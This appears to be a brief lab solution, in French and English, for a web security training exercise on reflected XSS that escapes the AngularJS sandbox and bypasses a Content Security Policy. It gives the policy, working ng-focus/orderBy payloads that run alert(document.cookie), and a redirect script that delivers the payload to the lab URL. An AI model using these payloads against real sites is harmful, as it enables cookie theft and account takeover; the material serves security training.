Évasion du sandbox AngularJS avec CSP
Reflected XSS with AngularJS sandbox escape and CSP




Mis à jour




Mis à jour
default-src 'self'; script-src 'self'; style-src 'unsafe-inline' 'self'<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'><input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(document.cookie)'><script>
location = 'https://0a7d008d035a764f8087997e004a0051.web-security-academy.net/?search=<input id=x+ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27>#x';
</script>